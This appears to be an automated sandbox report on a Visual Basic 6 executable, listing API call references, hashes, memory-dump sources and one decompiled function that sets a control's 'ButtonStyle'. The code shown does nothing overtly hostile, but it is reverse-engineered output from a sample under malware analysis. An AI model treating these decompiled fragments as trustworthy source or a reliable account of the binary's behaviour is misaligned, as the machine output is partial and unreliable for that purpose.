                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Copy$BoundsConstruct2DestructErrorGenerateMove
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 4063757251-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: 1826c31338c8c831fd2ed301a4fe05264573cbf1db843c12b00fde34302af9b6
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 4B313C38E511289BCB04DB98DD80AED7BB5FF4C341B50802BD50277764DB789946CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418AEF
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418AF7
                                                        • __vbaStrI4.MSVBVM60(00000003,?), ref: 00418B05
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B0C
                                                        • __vbaStrCmp.MSVBVM60(00000000), ref: 00418B13
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B25
                                                        • __vbaStrI4.MSVBVM60(00000000,?), ref: 00418B3A
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B41
                                                        • __vbaStrCmp.MSVBVM60(00000000), ref: 00418B48
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B5A
                                                        • __vbaStrI4.MSVBVM60(00000002,?), ref: 00418B6B
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B72
                                                        • __vbaStrCmp.MSVBVM60(00000000), ref: 00418B79
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418B8B
                                                        • __vbaStrI4.MSVBVM60(00000001,?), ref: 00418BA3
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418BAA
                                                        • __vbaStrCmp.MSVBVM60(00000000), ref: 00418BB1
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418BC3
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418BDB
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004015B8,0040F430,00000390), ref: 00418C1C
                                                        • __vbaFreeStr.MSVBVM60(00418C4E), ref: 00418C46
                                                        • __vbaFreeStr.MSVBVM60 ref: 00418C4B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Move$Copy$CheckHresult
                                                        • String ID: /0123456789$0123456789$ValidChar
                                                        • API String ID: 3800803223-993360373
                                                        • Opcode ID: 9936c4295f3419fa864d2406dec159a3d5d469b04311b958ada0c159a0da03f4
                                                        • Instruction ID: ce00569a0c4faf28ac5614b842da919fe116b62d6e28782c747920d2cd8abf0a
                                                        • Opcode Fuzzy Hash: 9936c4295f3419fa864d2406dec159a3d5d469b04311b958ada0c159a0da03f4
                                                        • Instruction Fuzzy Hash: 6C414171D001259BCB149FA4DD44AEEBBB8FB48700F10822EE556F72A0DB746D42CBD4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaRaiseEvent.MSVBVM60(?,0000000A,00000000), ref: 00418E6F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: EventRaise__vba
                                                        • String ID:
                                                        • API String ID: 143519346-0
                                                        • Opcode ID: 2f008d390904a31820b99e5045e0684bdfc6e2f20ee1861404945bbf347468bb
                                                        • Instruction ID: 7a7282b61c914d32d5a03fe8842630005b0ca5540c49441401ae5e2d8f5a45ae
                                                        • Opcode Fuzzy Hash: 2f008d390904a31820b99e5045e0684bdfc6e2f20ee1861404945bbf347468bb
                                                        • Instruction Fuzzy Hash: 9BE15A70D00209AFCB14DFA8D949AEEBBB4FF48300F14856AE545AB350DB74AD85CF99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 18%
                                                        			E00417230(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				char _v32;
                                                        				char _v36;
                                                        				intOrPtr _v40;
                                                        				intOrPtr _v48;
                                                        				char _v56;
                                                        				char _v60;
                                                        				intOrPtr* _v80;
                                                        				short _t63;
                                                        				void* _t66;
                                                        				signed int _t67;
                                                        				intOrPtr* _t68;
                                                        				signed int _t70;
                                                        				signed int _t71;
                                                        				void* _t73;
                                                        				signed int _t76;
                                                        				signed int _t77;
                                                        				intOrPtr* _t81;
                                                        				signed int _t82;
                                                        				signed int _t84;
                                                        				signed int _t88;
                                                        				intOrPtr* _t91;
                                                        				signed char _t95;
                                                        				signed int _t97;
                                                        				intOrPtr* _t101;
                                                        				char* _t116;
                                                        				intOrPtr _t129;
                                                        				intOrPtr* _t132;
                                                        				intOrPtr* _t133;
                                                        				intOrPtr* _t134;
                                                        				intOrPtr* _t135;
                                                        				intOrPtr* _t136;
                                                        				intOrPtr* _t137;
                                                        				intOrPtr* _t138;
                                                        				intOrPtr* _t140;
                                                        				void* _t141;
                                                        				void* _t143;
                                                        				intOrPtr _t144;
                                                        				intOrPtr _t145;
                                                        				intOrPtr* _t146;
                                                        				intOrPtr _t151;
                                                        
                                                        				_t144 = _t143 - 0xc;
                                                        				 *[fs:0x0] = _t144;
                                                        				_t145 = _t144 - 0x48;
                                                        				_v16 = _t145;
                                                        				_v12 = 0x401438;
                                                        				_v8 = 0;
                                                        				_t140 = _a4;
                                                        				_t63 =  *((intOrPtr*)( *_t140 + 4))(_t140, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t141);
                                                        				_v28 = 0;
                                                        				_v32 = 0;
                                                        				_v36 = 0;
                                                        				_v56 = 0;
                                                        				_v60 = 0;
                                                        				__imp____vbaI2I4();
                                                        				_t146 = _t145 - 0x10;
                                                        				_t132 = _t146;
                                                        				 *((short*)(_t140 + 0x42)) = _t63;
                                                        				 *_t132 = 8;
                                                        				 *((intOrPtr*)(_t132 + 4)) = _v48;
                                                        				 *(_t132 + 8) = L"ButtonStyle";
                                                        				 *((intOrPtr*)(_t132 + 0xc)) = _v40;
                                                        				_t66 =  *((intOrPtr*)( *_t140 + 0x390))(_t140);
                                                        				asm("fclex");
                                                        				if(_t66 < 0) {
                                                        					__imp____vbaHresultCheckObj(__eax, __esi, 0x40f430, 0x390);
                                                        				}
                                                        				_t67 = _a8;
                                                        				__eflags = _t67;
                                                        				if(__eflags == 0) {
                                                        					_t68 =  *((intOrPtr*)( *_t140 + 0x3ac))(_t140);
                                                        					__imp____vbaObjSet( &_v28, _t68);
                                                        					_t133 = _t68;
                                                        					_t70 =  *((intOrPtr*)( *_t133 + 0x9c))(_t133, 0);
                                                        					__eflags = _t70;
                                                        					asm("fclex");
                                                        					if(_t70 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t70, _t133, 0x410414, 0x9c);
                                                        					}
                                                        					__imp____vbaFreeObj();
                                                        					_t58 = _t140 + 0x74; // 0x417ca1
                                                        					E0040FB74();
                                                        					__imp____vbaSetSystemError( *_t58);
                                                        					_t71 =  *((intOrPtr*)( *_t140 + 0x8c8))(_t140);
                                                        					__eflags = _t71;
                                                        					if(_t71 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t71, _t140, 0x40f460, 0x8c8);
                                                        					}
                                                        					goto L26;
                                                        				} else {
                                                        					if(__eflags <= 0) {
                                                        						L27:
                                                        						asm("wait");
                                                        						_push(0x417511);
                                                        						return _t67;
                                                        					}
                                                        					__eflags = _t67 - 2;
                                                        					if(_t67 > 2) {
                                                        						goto L27;
                                                        					}
                                                        					_t73 =  *((intOrPtr*)( *_t140 + 0x3ac))(_t140);
                                                        					_t101 = __imp____vbaObjSet;
                                                        					_t134 =  *_t101( &_v28, _t73);
                                                        					_t76 =  *((intOrPtr*)( *_t134 + 0x9c))(_t134, 0xffffffff);
                                                        					__eflags = _t76;
                                                        					asm("fclex");
                                                        					if(_t76 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t76, _t134, 0x410414, 0x9c);
                                                        					}
                                                        					__imp____vbaFreeObj();
                                                        					_t77 =  *((intOrPtr*)( *_t140 + 0x8c8))(_t140);
                                                        					__eflags = _t77;
                                                        					if(_t77 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t77, _t140, 0x40f460, 0x8c8);
                                                        					}
                                                        					_t135 =  *_t101( &_v28,  *((intOrPtr*)( *_t140 + 0x3ac))(_t140));
                                                        					_t27 = _t140 + 0x10; // 0x80001
                                                        					_t81 =  *_t27;
                                                        					_t82 =  *((intOrPtr*)( *_t81 + 0x88))(_t81,  &_v56);
                                                        					__eflags = _t82;
                                                        					asm("fclex");
                                                        					if(_t82 < 0) {
                                                        						_t30 = _t140 + 0x10; // 0x80001
                                                        						__imp____vbaHresultCheckObj(_t82,  *_t30, 0x40f430, 0x88);
                                                        					}
                                                        					_t84 =  *((intOrPtr*)( *_t135 + 0x8c))(_t135, _v56);
                                                        					__eflags = _t84;
                                                        					asm("fclex");
                                                        					if(_t84 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t84, _t135, 0x410414, 0x8c);
                                                        					}
                                                        					__imp____vbaFreeObj();
                                                        					_t136 =  *_t101( &_v32,  *((intOrPtr*)( *_t140 + 0x3b0))(_t140));
                                                        					_t88 =  *((intOrPtr*)( *_t136 + 0x80))(_t136,  &_v60);
                                                        					__eflags = _t88;
                                                        					asm("fclex");
                                                        					if(_t88 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t88, _t136, 0x410414, 0x80);
                                                        					}
                                                        					_t91 =  *_t101( &_v36,  *((intOrPtr*)( *_t140 + 0x3ac))(_t140));
                                                        					_v80 = _t91;
                                                        					_t137 =  *_t101( &_v28,  *((intOrPtr*)( *_t140 + 0x3b0))(_t140));
                                                        					_t116 =  &_v56;
                                                        					_t95 =  *((intOrPtr*)( *_t137 + 0x70))(_t137, _t116);
                                                        					__eflags = _t95;
                                                        					asm("fclex");
                                                        					if(_t95 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t95, _t137, 0x410414, 0x70);
                                                        					}
                                                        					_t138 = _v80;
                                                        					_push(_t116);
                                                        					_t129 =  *_t138;
                                                        					_t151 = _v60 + _v56 +  *0x401430;
                                                        					asm("fnstsw ax");
                                                        					__eflags = _t95 & 0x0000000d;
                                                        					if((_t95 & 0x0000000d) != 0) {
                                                        						goto L1;
                                                        					} else {
                                                        						 *_t146 = _t151;
                                                        						_t97 =  *((intOrPtr*)(_t129 + 0x74))(_t138);
                                                        						__eflags = _t97;
                                                        						asm("fclex");
                                                        						if(_t97 < 0) {
                                                        							__imp____vbaHresultCheckObj(_t97, _t138, 0x410414, 0x74);
                                                        						}
                                                        						__imp____vbaFreeObjList(3,  &_v28,  &_v32,  &_v36);
                                                        						L26:
                                                        						_t67 =  *((intOrPtr*)( *_t140 + 0x8a4))(_t140);
                                                        						goto L27;
                                                        					}
                                                        				}
                                                        				L1:
                                                        				return __imp____vbaFPException();
                                                        			}















































                                                        0x00417233
                                                        0x00417242
                                                        0x00417249
                                                        0x0041724f
                                                        0x00417252
                                                        0x0041725b
                                                        0x0041725e
                                                        0x00417264
                                                        0x0041726a
                                                        0x0041726d
                                                        0x00417270
                                                        0x00417273
                                                        0x00417276
                                                        0x00417279
                                                        0x0041727f
                                                        0x00417287
                                                        0x0041728b
                                                        0x00417294
                                                        0x0041729a
                                                        0x0041729d
                                                        0x004172a3
                                                        0x004172a6
                                                        0x004172ae
                                                        0x004172b0
                                                        0x004172be
                                                        0x004172be
                                                        0x004172c4
                                                        0x004172c7
                                                        0x004172c9
                                                        0x0041747b
                                                        0x00417486
                                                        0x0041748c
                                                        0x00417492
                                                        0x00417498
                                                        0x0041749a
                                                        0x0041749c
                                                        0x004174aa
                                                        0x004174aa
                                                        0x004174b3
                                                        0x004174b9
                                                        0x004174bd
                                                        0x004174c2
                                                        0x004174cb
                                                        0x004174d1
                                                        0x004174d3
                                                        0x004174e1
                                                        0x004174e1
                                                        0x00000000
                                                        0x004172cf
                                                        0x004172cf
                                                        0x004174f0
                                                        0x004174f0
                                                        0x004174f1
                                                        0x00000000
                                                        0x004174f1
                                                        0x004172d5
                                                        0x004172d8
                                                        0x00000000
                                                        0x00000000
                                                        0x004172e1
                                                        0x004172e7
                                                        0x004172f4
                                                        0x004172fb
                                                        0x00417301
                                                        0x00417303
                                                        0x00417305
                                                        0x00417313
                                                        0x00417313
                                                        0x0041731c
                                                        0x00417325
                                                        0x0041732b
                                                        0x0041732d
                                                        0x0041733b
                                                        0x0041733b
                                                        0x00417351
                                                        0x00417353
                                                        0x00417353
                                                        0x0041735d
                                                        0x00417363
                                                        0x00417365
                                                        0x00417367
                                                        0x00417369
                                                        0x00417378
                                                        0x00417378
                                                        0x00417385
                                                        0x0041738b
                                                        0x0041738d
                                                        0x0041738f
                                                        0x0041739d
                                                        0x0041739d
                                                        0x004173a6
                                                        0x004173bc
                                                        0x004173c5
                                                        0x004173cb
                                                        0x004173cd
                                                        0x004173cf
                                                        0x004173dd
                                                        0x004173dd
                                                        0x004173f1
                                                        0x004173f6
                                                        0x00417406
                                                        0x00417408
                                                        0x0041740f
                                                        0x00417412
                                                        0x00417414
                                                        0x00417416
                                                        0x00417421
                                                        0x00417421
                                                        0x0041742d
                                                        0x00417430
                                                        0x00417431
                                                        0x00417433
                                                        0x00417439
                                                        0x0041743b
                                                        0x0041743d
                                                        0x00000000
                                                        0x00417443
                                                        0x00417443
                                                        0x00417447
                                                        0x0041744a
                                                        0x0041744c
                                                        0x0041744e
                                                        0x00417459
                                                        0x00417459
                                                        0x0041746d
                                                        0x004174e7
                                                        0x004174ea
                                                        0x00000000
                                                        0x004174ea
                                                        0x0041743d
                                                        0x00401d2c
                                                        0x00401d2c

                                                        APIs
                                                        • __vbaI2I4.MSVBVM60 ref: 00417279
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401438,0040F430,00000390), ref: 004172BE
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004172F2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000009C), ref: 00417313
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041731C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401438,0040F460,000008C8), ref: 0041733B
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041734F
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00080001,0040F430,00000088), ref: 00417378
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000008C), ref: 0041739D
                                                        • __vbaFreeObj.MSVBVM60 ref: 004173A6
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004173BA
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000080), ref: 004173DD
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004173F1
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00417404
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000070), ref: 00417421
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,00000074), ref: 00417459
                                                        • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041746D
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00417486
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000009C), ref: 004174AA
                                                        • __vbaFreeObj.MSVBVM60 ref: 004174B3
                                                        • __vbaSetSystemError.MSVBVM60(00417CA1), ref: 004174C2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401438,0040F460,000008C8), ref: 004174E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresult$Free$ErrorListSystem
                                                        • String ID: ButtonStyle
                                                        • API String ID: 2065985295-197681400
                                                        • Opcode ID: bbc5f41f7a73664bad52c5b0b027cf9e8044bf67631da28fab916a82f9a5d520
                                                        • Instruction ID: 561d5bf492293b92b3287269cc5aa7cb666504282eccd3689898acaca69567e2
                                                        • Opcode Fuzzy Hash: bbc5f41f7a73664bad52c5b0b027cf9e8044bf67631da28fab916a82f9a5d520
                                                        • Instruction Fuzzy Hash: AD917070600205AFD7109FA5CD88EEFBBB8FF49705F108529F585E71A1DB789485CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaAryConstruct2.MSVBVM60(?,00411224,00000011,?,00401610,?), ref: 0041D57F
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5A0
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5AA
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5E7
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5EF
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5FF
                                                        • __vbaUbound.MSVBVM60(00000001), ref: 0041D62C
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D667
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D671
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D68C
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D6AC
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D6B9
                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 0041D6EC
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D716
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D721
                                                        • __vbaAryLock.MSVBVM60(?,00000000), ref: 0041D731
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D74C
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D754
                                                        • __vbaUbound.MSVBVM60(00000001), ref: 0041D765
                                                        • __vbaSetSystemError.MSVBVM60(?,?,-00000001), ref: 0041D797
                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 0041D7A7
                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 0041D7AD
                                                        • __vbaUbound.MSVBVM60(00000001,00000000,00000000), ref: 0041D7B6
                                                        • __vbaRedimPreserve.MSVBVM60(00000080,00000001,0041A58C,00000011,00000001,-00000002), ref: 0041D7D2
                                                        • __vbaAryDestruct.MSVBVM60(00000000,?,0041D808), ref: 0041D801
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Error$BoundsGenerate$Ubound$LockUnlock$Construct2DestructPreserveRedimSystem
                                                        • String ID:
                                                        • API String ID: 1905101958-0
                                                        • Opcode ID: a8ad23f9dcfd01aeb99fb3139ad9a747c9cc8279730829ff87abc877471272d5
                                                        • Instruction ID: c484b7153b9cc1c62c94cb45b4a2f5e62638fb072080c510f63cda569a4f04e1
                                                        • Opcode Fuzzy Hash: a8ad23f9dcfd01aeb99fb3139ad9a747c9cc8279730829ff87abc877471272d5
                                                        • Instruction Fuzzy Hash: A7919FB4E00215DFCB14DFA4D9C8AD9BBB5FF09341B108166E816AB361D7B8D8C1CB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B730,?,00000000,?,00401668), ref: 0041E49C
                                                        • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,00401668), ref: 0041E4A9
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E4D4
                                                        • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E4E1
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041E4EC
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041E521
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041E52E
                                                        • __vbaFreeObj.MSVBVM60(0041E567), ref: 0041E560
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$AddrefNew2Text
                                                        • String ID:
                                                        • API String ID: 4148645594-0
                                                        • Opcode ID: 80fb95d01ea5f713bce111d37e34614ee59498b58a6ea8c2ebd7a0952463763a
                                                        • Instruction ID: f17fdf129ea994bf7013bdddb3dd996df24d5ced4d5fd2098d98c95f473ad1e0
                                                        • Opcode Fuzzy Hash: 80fb95d01ea5f713bce111d37e34614ee59498b58a6ea8c2ebd7a0952463763a
                                                        • Instruction Fuzzy Hash: 2E916174900209AFDB14DF95CD89EEEBBB9FF58701F10411AF901B72A0D7749985CBA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B83C,?,00000000,?,?), ref: 0041EE0C
                                                        • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 0041EE19
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EE44
                                                        • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041EE51
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041EE5C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041EE91
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041EE9E
                                                        • __vbaFreeObj.MSVBVM60(0041EED7), ref: 0041EED0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$AddrefNew2Text
                                                        • String ID:
                                                        • API String ID: 4148645594-0
                                                        • Opcode ID: 5a7762a4c5a1fbe5bcf878ec64fe97f77bc5abc50d34bcd47220fff9c1233cc3
                                                        • Instruction ID: 7cd1b4a5051931092e980ba27b48fc563e75ac000a27d3a4931071aa543f0103
                                                        • Opcode Fuzzy Hash: 5a7762a4c5a1fbe5bcf878ec64fe97f77bc5abc50d34bcd47220fff9c1233cc3
                                                        • Instruction Fuzzy Hash: 33914075900209AFCB14DF95CD88EEEBBB8FF48701F10811AF555B72A1D778A846CB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B730,00000000,00000000,00000000,?), ref: 0041DB5C
                                                        • __vbaObjSetAddref.MSVBVM60(?,?,00000000,00000000,?), ref: 0041DB69
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DB94
                                                        • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041DBA1
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041DBAC
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041DBE1
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041DBEE
                                                        • __vbaFreeObj.MSVBVM60(0041DC27), ref: 0041DC20
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$AddrefNew2Text
                                                        • String ID:
                                                        • API String ID: 4148645594-0
                                                        • Opcode ID: 1c8f982e608a3b3c4faed6ec19ba6c2181716eb0c28b32470594ae71323303db
                                                        • Instruction ID: 99d47f10f5cb731ab24f51dbfa51da87ee911a75198df4938470c603465efe0e
                                                        • Opcode Fuzzy Hash: 1c8f982e608a3b3c4faed6ec19ba6c2181716eb0c28b32470594ae71323303db
                                                        • Instruction Fuzzy Hash: 08912CB0E00209AFCB14DFA5DD88EEEB7B9FF58701F10851AF505A72A0D778A945CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B83C,?,00000000,00401720,00000000), ref: 0041EB74
                                                        • __vbaObjSetAddref.MSVBVM60(?,?,00000000,00401720,00000000), ref: 0041EB81
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EBB2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EBD9
